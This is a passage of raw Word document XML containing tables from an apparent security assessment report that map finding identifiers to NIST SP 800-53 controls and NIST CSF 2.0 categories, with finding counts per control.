              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-5 Denial-of-Service Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-04, CF-05, CF-07, CI-05, PB1-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-7 Boundary Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-8 Transmission Confidentiality and Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-03, DET-13, PB2-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-13 Cryptographic Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-18 Mobile Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SC-28 Protection of Information at Rest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-11, CI-03, SEC-03, SEC-04, SEC-05, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-2 Flaw Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-17, DEP-01, DEP-02, DEP-04, DEP-08, DEP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-4 System Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04, DET-02, DET-03, DET-04, DET-06, DET-07, DET-08, PB1-08, PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-7 Software, Firmware, and Information Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-08, CI-08, DEP-03, DET-16, SEC-08, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-10 Information Input Validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02, APP-07, APP-10, APP-12, APP-13, CF-01, CF-02, CF-04, CF-05, CF-06, CF-07, CF-08, CF-14, CF-15, CF-16, CF-18, CI-01, CI-05, CI-10, CI-15, DET-02, DET-05, DET-12, PB1-01, PB1-02, PB1-04, PB1-05, PB1-07, PB1-08, PB1-09, PB1-10, PB1-11, PB1-15, PB2-01, PB2-02, PB2-03, PB2-04, PB2-05, PB2-06, PB2-14, PB2-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-11 Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-12, CF-13, CF-14, CI-09, PB1-12, PB1-13, PB1-14, PB1-16, PB2-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SR-3 Supply Chain Controls and Processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-05, DEP-06, DEP-07, DEP-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SR-4 Provenance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-01, DEP-02, DEP-03, DEP-05, DEP-06, DEP-07, DEP-10, DEP-12, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SR-11 Component Authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-03, DET-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>AC-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-01, APP-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PT-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SA-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SI-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10.5 NIST Cybersecurity Framework 2.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Findings are mapped to CSF 2.0 function and category.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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4036"/>
        <w:gridCol w:w="4036"/>
        <w:gridCol w:w="568"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>GV.SC Govern - Cybersecurity Supply Chain Risk Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14, DEP-01, DEP-02, DEP-03, DEP-05, DEP-06, DEP-07, DEP-09, DEP-12, SEC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID.AM Identify - Asset Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-04, DEP-06, DEP-08, DEP-09, DEP-12, DET-19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID.RA Identify - Risk Assessment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06, DEP-01, SEC-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ID.IM Identify - Improvement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DET-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="568" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4036" w:type="dxa"/>
          </w:tcPr>
          <w:p>
